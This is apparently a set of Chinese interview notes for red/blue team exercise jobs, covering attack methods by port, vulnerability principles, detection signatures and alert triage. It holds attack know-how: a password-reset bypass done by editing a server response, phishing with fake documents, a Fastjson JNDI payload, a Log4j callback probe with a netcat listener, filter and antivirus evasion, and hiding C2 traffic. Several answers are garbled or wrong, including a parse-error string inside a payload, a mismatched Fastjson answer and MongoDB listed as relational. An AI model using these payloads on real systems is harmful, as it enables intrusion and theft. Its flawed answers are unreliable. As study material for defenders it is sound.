一、護網項目經驗

1.項目經驗

Hvv的分組和流程

HW分為藍隊和紅隊，紅隊為常說的攻擊隊，藍隊為防守隊。藍隊一般分為初級監測組，中級研判組，高級應急溯源組；

流程介紹：一般開始前會進行資產梳理，并通過漏洞掃描，滲透測試以及基線檢查等做一些自查，一是可以減少暴漏面，二是減少一些風險點。有些廠商還會利用幾天的時間進行一次內部演練，及時發現疏忽處并進行相應整改；

作為一個新手小白，主要做的就是堅守崗位，監測與甲方合作的安全廠商的一些監測設備，進行日志分析、IP封堵等，其實這些都沒有什么技術含量，懂web安全和滲透測試基礎的基本一看就會熟悉了，當然，部分廠商會對自己的合作伙伴們進行短期的產品培訓。

有沒有遇到過有意思的邏輯漏洞？

答：通過前端接口拼接發現信息泄露，包括姓名和手機號等信息，在忘記密碼處根據上述信息泄露收集的手機號，對其中一個手機號進行密碼修改，獲取手機驗證碼后，任意輸入手機驗證碼，進行抓包，修改響應包參數success為true，放包后顯示密碼修改成功，密成功登錄那個賬號的員工后臺

有沒有自己開發過武器/工具？

答：蜜罐，復刻的

有做過代碼審計嗎？有0day嗎

答：沒有，沒有

有cve/cnvd嗎？

答：我菜，沒有

有src排名嗎？

答：我菜，沒有

有沒有寫過技戰法

有

有釣魚經歷嗎？具體說說

答：偽造騰訊在線文檔，二維碼等騙取信息

你在hvv/攻防演練中取得了哪些成績？

答：這是第二次參加國家級護網，一共阻斷超3000個惡意IP；應急多起蠕蟲病毒告警

2.簡歷包裝

簡單自我介紹

面試官您好，我是xxx。熟悉常見的TOP10漏洞，有一定基本漏洞掃描和滲透能力 ,日志分析以及安全設備告警分析,能看懂安全產品，然后在校期間也是參加過項目研發的。

上一個工作的主要內容？

答：主要是進行監測和輔助隊友進行一個研判分析，同時負責總結，匯報情況，并申請采取對相應機器進行隔離。

二、滲透相關面試題

基礎端口號以及入侵方式

ftp文件傳輸協議：21，弱口令，匿名登陸
rdp端口：3389，遠程代碼執行
ssh端口：22，命令注入漏洞
telnet遠程連接服務：23，弱口令，暴力破解，提權
smtp郵件協議：25，郵件偽造
pop3協議：110，弱口令
http、https服務：80，443，常見的web攻擊
snmp協議：161，爆破
ldap目錄訪問協議：389，未授權訪問，爆破
smb協議：445，永恒之藍，永恒之黑
rsync應用程序linux：873，未授權訪問
mysql：3306，爆破，注入
SQL server：1433，爆破，注入攻擊
oracle：1521，爆破，注入攻擊
redis：6379，弱口令，未授權訪問   連接命令redis-cli
postgresql：5432，注入，爆破
mongodb：27017，爆破，未授權
nfs協議：2049，未授權訪問
zookeeper組件：2181，未授權訪問
docker：容器，未授權訪問，docker逃逸
zebra路由協議套件：弱口令，信息泄露
squid代理服務器軟件：3128，遠程命令執行
svn版本控制系統：3690，信息泄露，遠程代碼執行
rundeck服務平臺：4440，跨站請求偽造。
vnc遠程桌面共享協議：5900，弱口令，未授權
couchdb數據庫：5984，任意命令執行漏洞，越權
weblogic中間件：7001，反序列化，任意文件上傳，未授權
zabbix網絡監控工具：10050，代碼執行，登陸繞過
tomcat中間件：8080，遠程代碼執行，反序列化，弱口令
jboss中間件：8080，反序列化，未授權
jetty中間件：8080、8443，敏感信息泄露
jenkins中間件：8080，反序列化，遠程代碼執行，信息泄露
apache activemq后臺服務：開源信息代理，用于實現消息傳遞模式。遠程代碼執行
fastcgi框架：未授權，ssrf
Hadoop框架：未授權，遠程代碼執行
elasticsearch監聽端口：是一個搜索引擎 9200，未授權訪問，命令執行，目錄穿越
webmin-web控制面板：系統管理工具，管理unix系統web界面控制面板。遠程命令執行
memcached監聽端口：是一個內存緩存軟件。11211，未授權，命令執行

OSI七層協議

物理層
數據鏈路層
網絡層
傳輸層
會話層 
表示層 
應用層

響應狀態碼都有哪些？

• 404：404 狀態碼表示請求資源不存在，即表示攻擊失敗；
• **200：**200 狀態碼表示請求成功，但是請求成功并不代表攻擊成功，具體需要結合請求與 響應進行判斷；如下圖攻擊中，攻擊者嘗試利用 Struts2 遠程代碼執行漏洞（S2-045）對目標 系統進行攻擊，響應狀態碼為 200。該漏洞攻擊載荷在 HTTP 請求頭部的 Content-Type，分 析該攻擊載荷，如果漏洞存在的話會在響應的頭部添加 testvuln 字段，值為 1234x1234 即 1522756。分析響應的頭部，并未發現存在 testvuln 字段，因此研判該漏洞攻擊未成功。
• 401：401 狀態表示未授權狀態。該狀態碼返回常見于 HTTP 的 Basic 認證。
• 500：500 狀態碼表示服務器內部錯誤，通常漏洞攻擊也會導致出現 500 錯誤，但是出現 500 錯誤并不表示攻擊失敗，需要根據實際情況研判。
• 301：本狀態碼將瀏覽器【永久重定向】到另外一個在Location消息頭中指定的URL。以后客戶端應使用新URL替換原始URL。
• 302：本狀態碼將瀏覽器【暫時重定向】到另外一個在Location消息頭中指定的URL.客戶端應在隨后的請求中恢復使用原始URL.

WAF和IPS的區別

答：IPS位于防火墻和網絡的設備之間，防火墻可以攔截底層攻擊行為，但對應用層 的深層攻擊行為無能為力。IPS是對防火墻的補充。綜合能力更強一些；WAF是工作在應用層的防火墻，主要對web請求/響應進行防護。

盲注是什么？

就是你在測試注入數據庫的時候，數據庫沒有任何回顯，只顯示對錯。

java內存馬類型

filter listener servlet websocket javaagent

內存馬有幾種類型

內存馬是一種在受感染的主機內存中運行的惡意軟件。一般來說，內存馬可以分為以下幾種類型：
注入型內存馬：通過利用漏洞將惡意代碼注入到正常進程中，從而在內存中運行。
自執行型內存馬：將惡意代碼寫入自啟動項，啟動后自動運行。
進程注入型內存馬：利用進程注入技術，在受感染進程的內存中運行惡意代碼。
Hook型內存馬：利用Windows API的Hook機制，修改進程中的關鍵函數，從而運行惡意代碼。
要判斷內存馬的類型，可以使用反病毒軟件或專門的安全工具對受感染主機進行掃描和分析。一般來說，不同類型的內存馬會留下不同的痕跡和特征，比如某些進程的不正常行為、異常的網絡連接等等。
針對不同類型的內存馬，處理方法也會有所不同。一般來說，可以采取以下措施：
注入型內存馬：修復漏洞、升級軟件，加強網絡安全防護等方法來預防類似攻擊；對已經感染的主機，可以通過殺掉受感染進程或卸載惡意程序等方式來清除內存馬。
自執行型內存馬：可以通過清理自啟動項、卸載惡意程序等方式來清除內存馬。
進程注入型內存馬：可以通過殺掉受感染進程或卸載惡意程序等方式來清除內存馬。
Hook型內存馬：可以通過還原Hook、修復關鍵函數、殺掉受感染進程或卸載惡意程序等方式來清除內存馬。

shiro反序列化漏洞原理？

瀏覽器或服務器重啟后用戶不丟失登錄狀態，Shiro 支持將持久化信息序列化并加密后保存在 Cookie 的 rememberMe 字段中，下次讀取時進行解密再反序列化。但是在 Shiro 1.2.4 版本之前內置了一個默認且固定的加密 Key導致攻擊者可以偽造任意的 rememberMe Cookie，進而觸發反序列化漏洞

Apache Shiro框架提供了記住密碼的功能（RememberMe），用戶登錄成功后會生成經過加密并編碼的cookie。在服務端對rememberMe的cookie值，先base64解碼然后AES解密再反序列化，就導致了反序列化RCE漏洞那么，Payload產生的過程： 命令=>序列化=>AES加密=>base64編碼=>RememberMe Cookie值在整個漏洞利用過程中，比較重要的是AES加密的密鑰如果沒有修改默認的密鑰那么就很容易就知道密鑰了

shiro550與shiro721的區別：

1、這兩個漏洞主要區別在于Shiro550使用已知密鑰碰撞，只要有足夠密鑰庫（條件較低），不需要Remember Cookie
2、Shiro721的ase加密的key基本猜不到，系統隨機生成，可使用登錄后rememberMe去爆破正確的key值，即利用有效的RememberMe Cookie作為Padding Oracle Attack的前綴，然后精心構造 RememberMe Cookie 值來實現反序列化漏洞攻擊，難度較高

Apache Log4j2 遠程代碼執行漏洞原理？

Apache Log4j2 框架中存在一個名為 JNDI Lookup 的功能，它允許通過配置文件中的 JNDI 名稱引用外部資源。攻擊者構造一個特殊的日志消息，其中包含惡意的 JNDI 名稱，并通過網絡發送給受影響的應用程序。當應用程序使用 Log4j2 框架解析日志消息時，它會嘗試查找和引用該 JNDI 名稱。如果惡意的 JNDI 名稱指向一個惡意的遠程資源，例如惡意的 LDAP 服務器或 RMI 服務，攻擊者可以控制該遠程資源的內容和行為。攻擊者可以在惡意的遠程資源中注入惡意代碼，并在目標系統上執行任意命令或獲取敏感信息。

bp怎么隱藏不讓對方發現

1. 代理設置-其他設置-禁用http://brup…
2. 代理設置-其他設置-忽略brup錯誤

fastjson不出網怎么打

使用Fastjson的黑名單功能：Fastjson提供了一個黑名單功能，可以用于禁止某些Java類的序列化和反序列化，可以通過設置一些敏感類的黑名單，禁止序列化和反序列化這些類，從而避免一些惡意攻擊。
對Fastjson進行安全加固：對Fastjson進行安全加固，可以避免惡意攻擊。可以通過開啟自動類型識別檢查、限制反序列化對象的深度、限制反序列化對象的大小等措施，提高Fastjson的安全性。
使用其他JSON處理器：如果對Fastjson存在疑慮或者擔心其安全性問題，也可以考慮使用其他JSON處理器，比如Jackson、Gson等。這些處理器同樣具有高性能和易用性，并且也可以進行安全加固。
fastjson 反序列化攻擊是一種嚴重的安全漏洞，可能會導致應用程序受到攻擊和損失

Fastjson反序列化漏洞

判斷：
正常請求是get請求并且沒有請求體，可以通過構造錯誤的POST請求，即可查看在返回包中是否有fastjson這個字符串來判斷。
原理：
fastjson是阿里巴巴開發的一款將json字符串和java對象進行序列化和反序列化的開源json解析庫。
fastjson提供了autotype功能，在請求過程中，我們可以在請求包中通過修改@type的值，來反序列化為指定的類型，而fastjson在反序列化過程中會設置和獲取類中的屬性，
如果類中存在惡意方法，就會導致代碼執行等這類問題。
無回顯怎么辦：
1.一種是直接將命令執行結果寫入到靜態資源文件里，如html、js等，然后通過http訪問就可以直接看到結果
2.通過dnslog進行數據外帶，但如果無法執行dns請求就無法驗證了
3.直接將命令執行結果回顯到請求Poc的HTTP響應中
利用fastjson注入內存馬原理
不知道這里應該怎么說，例如spring mvc的話就是通過fastjson的反序列化，利用jndi的方式讓web端加載惡意類，注入controller

為什么aspx的權限會比asp的權限更高

ASPX 和 ASP 都是用于創建動態Web頁面的技術，但它們的實現方式略有不同。
ASP 是經典的ASP技術，它使用VBScript或JScript等腳本語言創建動態Web頁面。在ASP中，權限控制是通過服務器操作系統的權限機制實現的。
而ASPX是ASP.NET技術中的一部分，它使用C#、VB.NET等編程語言創建Web頁面。在ASP.NET中，權限控制是通過.NET框架提供的安全機制實現的。這些機制包括代碼訪問安全性、角色管理和基于表單的身份驗證等。
因此，ASPX的權限控制比ASP更高，因為它基于.NET框架提供的安全機制，這些機制比操作系統的權限機制更強大和靈活。此外，ASPX還提供了更多的安全選項，例如加密會話狀態和防止跨站點腳本攻擊等。

Windows和Linux利用REDIS有什么不一樣

redis是一個非關系型數據庫，使用的默認端口是6379。常見的漏洞是未授權訪問漏洞，攻擊者無需認證就可以訪問內部數據。
性能：Redis在Linux上運行的性能通常比在Windows上運行的性能更好，這是由于Linux系統的設計和優化使得其能夠更好地利用系統資源。
可用性：在Windows上運行Redis時，其可用性通常會受到操作系統的限制，例如系統的最大打開文件數和最大連接數等。而在Linux上，這些限制通常可以通過修改系統配置文件來解決。
安全性：Redis的安全性與其在Windows或Linux上運行的方式無關，但是在實踐中，由于Windows和Linux的不同權限模型和安全機制，使用Redis時需要采取不同的安全措施。例如，在Linux上，可以使用文件系統權限和防火墻規則來保護Redis服務器，而在Windows上，需要使用Windows防火墻和用戶權限來保護Redis服務器。

CRLF注入

Nginx中常見的中間件漏洞；
CRLF注入（也稱為HTTP頭注入）是一種攻擊技術，攻擊者通過注入CRLF字符序列（即回車換行）來改變HTTP頭部的內容，從而實現各種攻擊目的，例如HTTP響應拆分、HTTP重定向、會話劫持等。
攻擊者通常會將CRLF字符序列注入到HTTP請求或響應的參數中，例如Cookie、User-Agent、Referer等。在受害者的Web應用程序中，如果沒有對這些參數進行有效的輸入驗證和過濾，那么CRLF字符序列就會被當作有效的HTTP頭部分隔符，并導致HTTP頭部的內容被注入。
例如，攻擊者可以將以下內容作為User-Agent參數發送給Web應用程序：
User-Agent: <script>alert('CRLF Injection')</script>\r\n\r\nHTTP/1.1 200 OK
在這個例子中，攻擊者在User-Agent參數中注入了CRLF字符序列，以便將HTTP響應頭部分隔為兩個部分。第一個部分是攻擊者自己構造的HTTP響應頭部分，第二個部分則是Web應用程序返回的HTTP響應體。
如果Web應用程序沒有對這個User-Agent參數進行有效的輸入驗證和過濾，那么攻擊者就可以成功地將自己構造的HTTP響應頭部發送給受害者瀏覽器，從而實現各種攻擊目的。例如，攻擊者可以在自己構造的HTTP響應頭中設置Location字段，將用戶重定向到惡意站點，從而實現HTTP重定向攻擊。或者攻擊者可以在自己構造的HTTP響應頭中設置Set-Cookie字段，從而實現會話劫持攻擊。
為了防止CRLF注入攻擊，Web應用程序應該對所有HTTP請求和響應參數進行有效的輸入驗證和過濾，包括Cookie、User-Agent、Referer等。在輸入驗證和過濾時，應該使用白名單過濾的原則，只允許合法的字符集通過，而拒絕所有不合法的字符。同時，Web應用程序應該使用最新的安全框架和庫來保護自己，以及及時更新系統和軟件的安全補丁。

反彈shell的原理是什么

利用TCP協議傳了一個bash環境

文件上傳怎么繞過

因為是黑盒測試，你不知道它的檢測規則是怎么樣的，看看對哪方面做了檢測，有可能只是前端檢測，再針對的去繞過，一般的話我先根據后端語言去跑一遍后綴名字典，然后去嘗試各種方法，例如變換大小寫，插入各種特殊字符像%00、單引號、換行符，去構造一些畸形的數據包

csrf跟ssrf區別

CSRF (Cross-site request forgery)跨站請求偽造SSRF (Server-Side Request Forgery)服務器端請求偽造csrf 一個是客戶端發起，ssrf是從服務端發起的

SSRF用哪些協議、函數，怎么繞過，修復

file、dict、ldap、gopher，可以利用curl函數、file_get_contents()函數、fsockopen()
繞過：使用短網址、進制轉換、302跳轉、DNS重綁
修復：禁止不需要的協議、設置URL白名單、統一返回信息、限制請求的端口

xss可以使用哪些標簽

這個太多了，常用的就
<script><a<iframe<EMBED<svg<body <object<form<img

XSS彈窗函數和常見的XSS繞過策略？

• **彈窗函數：**alert、confirm、prompt、onclick
• **繞過策略：**大小寫混寫；雙寫；<img/src=1>；%0a或者%0d繞過；拼湊繞過

Mssql xp_cmdshell被禁用了怎么辦

先看看能不能手動啟用，不能的話看看有沒有其他的擴展存儲可以利用，有的可以執行系統命令，記得有的可以直接操作注冊表，也可以利用CLR技術，類似于mysql中的UDF吧，可以直接使用16進制代碼來創建自定義函數

XXE中PCDATA和CDATA有什么區別

PCDATA就是被解析的字符數據，會被解析，CDATA屬于不會被解析器解析的文本

了解哪些中間件漏洞

IIS有解析漏洞，PUT任意文件寫入漏洞，短文件漏洞，Apache也有解析漏洞，然后目錄遍歷遇到的比較多，Tomcat的話war后門部署、遠程代碼執行，jBoss和WebLogic的話就反序列化漏洞，weblogic還有ssrf漏洞，任意文件上傳

Kali工具使用

wireshark

Burpsuite等工具抓包

開代理，將關鍵數據send to repeater,修改

報錯注入的原理是什么？

在MYSQL中使用一些指定的函數來人為制造報錯，后臺沒有屏蔽數據庫報錯信息， 在語法發生錯誤使得查詢結果能夠出現在錯誤信息中回顯在前端，從而從報錯信息中獲取設定的信息。

Webshell是什么，原理是什么

WebShell就是一句話木馬，由于腳本語言的動態性，木馬文件通過命令執行system函數或者代碼執行eval函數等，參數為用戶外部傳入（如GET傳參，POST傳參）達到執行任意代碼任意命令的功能。從而遠程控制目標主機

常用的Webshell管理工具

冰蝎，蟻劍，哥斯拉，菜刀

冰蝎和菜刀等webshell工具有什么區別？

答：冰蝎有流量動態加密

Redis未授權有了解嗎

答：有，可以配合ssrf打組合拳

Springboot 有哪些漏洞？

答：只知道一個snakeyaml

常見的網絡服務器容器

IIS、Apache、nginx、Lighttpd、Tomcat 

有哪些威脅情報平臺

微步，綠盟，阿里云，奇安信等

序列化與反序列化的區別

序列化：把對象轉化為可傳輸的字節序列過程稱為序列化
反序列化：把字節序列還原為對象的過程稱為反序列化

正向SHELL和反向SHELL的區別

正向shell，攻擊者連接被攻擊者機器反向shell，被攻擊者主動連接攻擊者正向代理，客戶端代理，服務器不知道實際發起請求的客戶端反向代理，服務器代理，客戶端不知道實際提供服務的服務端

xxe原理與攻擊手法

答：解析XML輸入時可以加載外部實體類，造成文件讀取，命令執行等危害。直接dtd加載dnslog等等

xss除了獲取cookie還能干什么

答：用戶劫持、結合csrf補充：貌似能提權？

ssrf的原理與危害？

答：偽造服務器給內網發消息

ssrf和csrf有什么區別？

答：csrf偽造客戶端，ssrf偽造服務器端

如何尋找注入點

答：字符，數字，盲注…

有用過sql注入傳馬嗎

答：用過into outfile補充：可以通過日志文件寫入木馬

–os-shell的條件

答：擁有網站的寫入條件補充：Secure_file_priv參數為空或者為指定路徑。

內存馬免殺有做過嗎？具體說說

答：沒做過，在網上找現成的補充：Filter名稱是否合理Filter對應的類名是否合理Filter對應的類是否在classpath下網站web.xml中是否存在改filter

不借助dnslog有辦法檢測log4j2是否出網嗎

答：dns到vps判斷是否出網補充：使用logg.error(“KaTeX parse error: Expected ‘}’, got ‘EOF’ at end of input: …s://xxxxx:8090/{java:version}}”);在自己的VPS上nc -luvvp 8090即可收到信息

你是如何驗證struts2是否存在的

答：檢測工具，或者抓包，改post，把content-Type改為application/xml,放上payload

數據庫有哪些，關系型的和非關系型的分別是哪些

#### 關系型MySQL：3306SQL Server：1433Oracle：1521DB2：5000MongoDB：27017

#### 非關系型Redis：6379Memcached：11211PHP反序列化

PHP代碼執行的危險函數

call_user_func()
call_user_func_array()
create_function()
array_map()

PHP命令執行函數

system
shell_exec
passthru
exec
popen
proc_open
putenv
assert

linux和windows怎么判斷

linux大小寫敏感

什么是免殺

將shellcode進行加密，動態解密恢復，申請可寫可執行內存并寫入解密后的shellcode，將函數指針指向這塊內存的起始位置并開始執行。

免殺有幾種途徑？

答：修改特征碼、流量混淆、花指令、加殼

Java常見的框架中間件及漏洞

struct2框架

一個基于MVC設計模式的Web應用框架)這個框架全是漏洞

fastjson框架

阿里巴巴開源的JSON工具解析庫1.2.47版本前存在反序列化漏洞框架特征：post數據包，content-type為application/json, post內容為json數據，且其中有@type標識

比如

{  "a":{      "@type":"java.lang.Class",      "val":"com.sun.rowset.JdbcRowSetImpl"  },  "b":{      "@type":"com.sun.rowset.JdbcRowSetImpl",      "dataSourceName":"rmi://127.0.0.1:1099/Exploit",      "autoCommit":true  }}

shiro框架

apache的一個權限管理的開源框架,實現 用戶認證、用戶授權。若shiro框架服務端使用默認密鑰，則會存在反序列化漏洞框架特征：cookie字段為存在rememberMe=xxxxx;

weblogic容器

一個基于JAVAEE架構的中間件weblogic存在許多漏洞，弱口令，SSRF，反序列化，任意文件上傳，XMLDecoder反序列化框架特征，一般在7001端口，漏洞檢測常用工具

tomcat容器

最常見的java web容器漏洞，弱口令，幽靈貓，PUT方法任意寫文件框架特征，一般為8080端口

云函數了解嗎，怎么防御

1. C2客戶端發出的流量經過云函數轉發到達C2服務器，因為云函數的服務器是自帶CDN的，從而達到隱藏的效果。
2. 封禁域名apigw.tencentcs.com

三、流量分析面試題

響應狀態碼都有哪些？

不管是對于什么 WEB 漏洞攻擊的研判，響應狀態碼都是研判成功與否的首要研判依據， 如果響應狀態碼為 404 基本可以研判攻擊失敗，也就無需再根據請求響應等進一步研判了。（當然，這并不是絕對的，也有例外的情況，攻擊者在一些情況下也可以篡改響應狀態碼， 如 WebShell 的響應狀態碼。現在這種情況不多見，暫時可以先不考慮）

• 404：404 狀態碼表示請求資源不存在，即表示攻擊失敗；
• **200：**200 狀態碼表示請求成功，但是請求成功并不代表攻擊成功，具體需要結合請求與 響應進行判斷；如下圖攻擊中，攻擊者嘗試利用 Struts2 遠程代碼執行漏洞（S2-045）對目標 系統進行攻擊，響應狀態碼為 200。該漏洞攻擊載荷在 HTTP 請求頭部的 Content-Type，分 析該攻擊載荷，如果漏洞存在的話會在響應的頭部添加 testvuln 字段，值為 1234x1234 即 1522756。分析響應的頭部，并未發現存在 testvuln 字段，因此研判該漏洞攻擊未成功。
• 401：401 狀態表示未授權狀態。該狀態碼返回常見于 HTTP 的 Basic 認證。
• 500：500 狀態碼表示服務器內部錯誤，通常漏洞攻擊也會導致出現 500 錯誤，但是出現 500 錯誤并不表示攻擊失敗，需要根據實際情況研判。
• 301：本狀態碼將瀏覽器【永久重定向】到另外一個在Location消息頭中指定的URL。以后客戶端應使用新URL替換原始URL。
• 302：本狀態碼將瀏覽器【暫時重定向】到另外一個在Location消息頭中指定的URL.客戶端應在隨后的請求中恢復使用原始URL.

常見webshell管理工具交互流量特征都有哪些？

菜刀特征：

默認的webshell中鏈接密碼都是caidao，ua頭為百度爬蟲、請求體中存在eavl，base64等特征字符
響應包中包含X@Y、php的webshel中流量參數z0、z1、z2

冰蝎3.0

默認內置 16 個 user-agent，content-type為application/octet-stream** 
請求包中content-length 為5740或5720（可能會根據Java版本而改變)
**每一個請求頭中存在Pragma: no-cache，Cache-Control: no-cache**

冰蝎2.0

建立連接后 所有請求 **Cookie的格式都為: Cookie: PHPSESSID=; path=/；**
靜態分析：
各種語言的webshell中都會存在**16位數的連接密碼**，默認變量為key

冰蝎3.11流量特征

1、header頭順序是顛倒的
2、發送包是base64，返回包是字節數組，所以會亂碼
3、如果冰蝎密碼不對，會出現兩個連接，第一個是post 第二個是get
4. content-type為application/octet-stream ，請求包中content-length 為5740或5720（可能會根據Java版本而改變)，每一個請求頭中存在Pragma: no-cache，Cache-Control: no-cache
5.異常User-Agent---- 出現WOW64等
6. 頻繁訪問默認的路徑/conn.jsp

蟻劍

PHP 類 WebShell流量最中明顯的特征為 @ini_set ("display_errors","0");
同時會帶有base64編碼解碼等字符特征， **每個請求體都存在@ini_set(“display_errors”, “0”);
@set_time_limit(0)開頭**。并且存在base64等字符，響應包的結果返回格式為 隨機數 結果 隨機數

哥斯拉：

不修改User-Agent，User-Agent會類似于Java/1.8.0_121（具體什么版本取決于JDK環境版本）
在請求包的Cookie中有一個非常致命的特征，最后的分號
標準的HTTP請求中最后一個Cookie的值是不應該出現;的
**請求包的特征**
1. “pass=”起始
2. 請求包較長 響應包為0
3. 一個tcp包里面有三個http
**響應包特征**
整個響應包的結構體征為：md5前十六位+base64+md5后十六位

哥斯拉4.0.1中JAVA_AES_BASE64特征流量特征

host頭
密碼和base64字符串是密碼=base64字符串的形式
發送包是密碼=bae64字符串的形式，返回包是類base64字符串的格式

1. 對稱加密算法：JAVA_AES_BASE64是哥斯拉4.0.1使用的對稱加密算法;因此可以根據哥斯拉4.0.1的流量中是否包含JAVA_AES_BASE64來判斷是否為哥斯拉4.0.1攻擊流量
2. 長度固定：哥斯拉4.0.1使用JAVA_AES_BASE64算法對數據進行加密后，加密后數據的長度是固定的因此，可以根據攻擊流量的長度是否固定來判斷是否為哥斯拉4.0.1攻擊流量
3. 常見數據前綴：哥斯拉4.0.1加密的數據在明文數據前會添加特定的前綴;因此，可以根據攻擊流量中是否包含常見的數據前綴來判斷是否為哥斯拉4.0.1攻擊流量。

內存馬

先判斷是通過什么方法注入的內存馬，可以先查看web日志是否有可疑的web訪問日志
如果是filter或者listener類型就會有**大量url請求路徑相同參數不同的，或者頁面不存在但是返回200的**，
查看是否有類似哥斯拉、冰蝎相同的url請求，哥斯拉和冰蝎的內存馬注入流量特征與普通webshell的流量特征基本吻合
通過查找**返回200的url路徑對比web目錄下是否真實存在文件，如不存在大概率為內存馬**
如在web日志中并未發現異常，可以排查是否為中間件漏洞導致代碼執行注入內存馬，
排查中間件的error.log日志查看是否有可疑的報錯，根據注入時間和方法根據-
業務使用的組件排查是否可能存在java代碼執行漏洞以及是否存在過webshell，排查框架漏洞，反序列化漏洞。

流量層面分析shiro反序列化漏洞是否攻擊成功？

1. 在HTTP請求頭Cookie里出現rememberMe字段以及可能出現自定義類型例如c: aWQ=，響應體中出現大量編碼字符串，若需要判斷是否攻擊成功，需對請求數據和響應體內容進行解密判斷
2. 檢查請求頭中的"rememberMe" cookie。攻擊者可能會在此處插入惡意序列化數據
3. 觀察服務器響應。如果服務器返回了異常錯誤信息，如Java反序列化異常，可能表明攻擊成功分析應用程序日志:如果日志中出現了異常堆棧跟蹤，可能表明攻擊成功例如，攻擊者發送了一個包含惡意序列化數據的請求，服務器響應了一個包含Java反序列化異常的錯誤信息這可能表明攻擊成功。

在發生命令執行攻擊時，如何判斷是struts2漏洞執行命令？

1. 在請求頭中存在OGNL表達式，一般在url中會出現的攻擊特征主要是:.action?method | ?redirect:$ 在conten-type中出現的攻擊特征主要有:%{#context 、在報文體中出現的攻擊特征主要有:#_memberAccess 等
2. 判斷請求中是否包含特定的 Struts2 關鍵字，如"method:"、"redirect:"等，這些關鍵字可能是用于執行命令的操作；
3. 檢查請求中是否包含"Content-Type"頭字段，并且值為"application/x-www-form-urlencoded"，這是 Struts2 框架默認的 Content-Type 值，用于處理 POST 請求；
4. 檢查請求參數中是否包含OGNL表達式，如"${}"、"%{}"等字符；
5. 檢查請求是否包含一個名為"class"的參數，值為"java.lang.Runtime"，這個參數可以用于執行系統命令

威脅情報類告警產生誤報的原因是什么？

1、防火墻、郵件網關有發起黑域名解析的行為可能是誤報``
2、威脅情報失效了

如何分析文件上傳告警是否攻擊成功？

1、查看響應體響應結果判斷服務器是否接受了該上傳請求，上傳成功通常狀態碼為200，查看響應體中是否響應了上傳路徑，訪問該上傳路徑查看文件是否被解析是否存在
2、通過查看態勢感知日志判斷文件是否落地
3、登陸受害者主機全局搜索上傳文件

如何判斷Cobalt Strike攻擊流量？

1、http-beacon通信中，默認使用get方法向/dpixel、/__utm.gif、/pixel.gif等地址發起請求，同時請求頭存在cookie字段并且值為base64編碼
2、dns-beacon通信中，默認使用cdn.、www6.、api.、www.、post.為開頭發起dns請求，并且查詢結果伴隨0.0.0.0、0.0.0.80、0.0.0.241等非常規IP
3、心跳包間隔一定時間，均有通信，且流級上的上下行數據長度固定
4、常見User-Agent：Cobalt Strike通常使用自定義的User-Agent字符串，例如Mozilla/5.0 (Windows NT 10.0; Win64; x64) Cobalt Strike
5、命令和控制流量：Cobalt Strike的HTTP請求中可能包含與C2服務器通信的命令和控制信息，這些信息在正常的Web請求中不會出現。

發生挖礦木馬事件通過流量層面如何判斷真實性？

1. 通信端口：挖礦木馬可能會使用特定的端口進行通信。例如，Monero挖礦木馬通常會使用TCP端口3333或5555進行通信
2. 通信流量：挖礦木馬的通信流量可能會具有特定的特征，例如大量的高速數據傳輸和周期性的通信，在數據包中可以看到大量的計算資源使用信息和挖礦結果信息
3. 進程和文件系統：挖礦木馬可能會創建特定的進程和文件來執行挖礦操作。例如，Monero挖礦木馬通常會在操作系統上創建名為"xmrig"的進程，并在文件系統上創建名為"config.json"的配置文件
4. 系統資源：挖礦木馬可能會占用系統資源，例如CPU和內存，并可能導致系統崩潰或變得緩慢。
5. 判斷流量的數據：挖礦木馬通常會在通信中發送一些特定的數據，例如挖礦難度、錢包地址、挖礦程序版本等如果流量中存在這些數據，就可能存在挖礦木馬
6. 看數據包的詳細信息，看終端或者服務器是否有與礦池交互的信息，判斷是否存在登錄到礦池（method“:”login“）、從礦池接收任務（”method“:”job“）字段，在載荷內容中是否存在ok、success等字段

流量層面分析Apache Log4j2 遠程代碼執行漏洞是否攻擊成功？

1、dnslog類：查看是否存在源ip與dnslog的外聯日志記錄2、命令執行攻擊2.1 有回顯：響應體中存在命令執行結果2.2無回顯 ：存在源ip與ldap服務ip的外聯日志記錄

如何研判sql注入類型告警事件？

1.排除302、404、301、502，非200狀態碼
2.判斷請求包內相關的sql語句是否為惡意的SQL語句
3.判斷響應體內是否包含數據庫敏感信息，或者系統信息。

如何研判JBOSS 反序列化漏洞攻擊成功？

1.在訪問JBOSS漏洞頁面/invoker/readonly后，返回值為500
2.請求體有llections.map.LazyMap、keyvalue.TiedMapEntry攻擊鏈特征并且有明顯的命令執行行為比如whoami
3.在返回500 堆棧報錯頁面內容中包含了系統返回內容 比如系統用戶：root

如何研判Fastjson反序列化漏洞攻擊成功？

1.請求頭：method: POST content_type: application/json
2.請求體：data:com.sun.rowset.JdbcRowSetImpl,dataSourceName,@type
3.請求體: 包含攻擊者C2服務器地址
4.狀態碼為：400  也可能是500
5.通過態勢感知平臺進行回溯分析，在分析中心輸入語法：(sip:(失陷服務器IP) OR sip:(攻擊者C2IP)) AND (dip:(失陷服務器IP) OR dip:(攻擊者C2IP))

log4j特征，如何判斷他攻擊成功沒

以下是Log4j漏洞的一些特征：
攻擊者使用惡意請求中的特定參數名稱和值來觸發Log4j漏洞。這些參數包括JNDI名稱和惡意JNDI URL。
攻擊者通常會使用反向Shell或遠程訪問工具來執行任意命令或控制受感染的系統。
攻擊者的攻擊可能被記錄在受感染應用程序的日志中。這些日志通常會顯示異常或錯誤信息，或者包含關于漏洞攻擊的詳細信息。
受感染的應用程序通常會發起大量的網絡請求，嘗試將攻擊者的命令或代碼發送到攻擊者的服務器。
要判斷Log4j漏洞攻擊是否成功，可以采取以下措施：
監視受感染應用程序的日志，查看是否有異常或錯誤信息，或者是否包含與攻擊相關的信息。
監視網絡流量，查看是否有大量的請求被發送到攻擊者的服務器。
檢查系統中的異常或警告信息，例如系統崩潰、不正常的CPU使用率或內存使用率等。
在受感染的系統中進行代碼審查，查看是否有與攻擊相關的代碼或配置文件。
如果發現應用程序受到了Log4j漏洞攻擊，應立即采取措施來解決漏洞，并且必須對系統進行全面檢查，以確保沒有其他漏洞或后門存在。同時，建議采取安全措施，例如升級Log4j版本、禁用JNDI功能、限制應用程序的輸入等，以防止類似漏洞的再次出現。

SQL注入攻擊通常具有以下特征：

基于輸入參數的攻擊：SQL注入攻擊是基于Web應用程序的輸入參數進行的。攻擊者通常通過修改輸入參數中的某些值來注入惡意SQL語句。
錯誤提示信息：SQL注入攻擊可能會導致Web應用程序返回錯誤提示信息。攻擊者可以根據這些錯誤提示信息，獲得Web應用程序的數據庫結構和其他敏感信息。
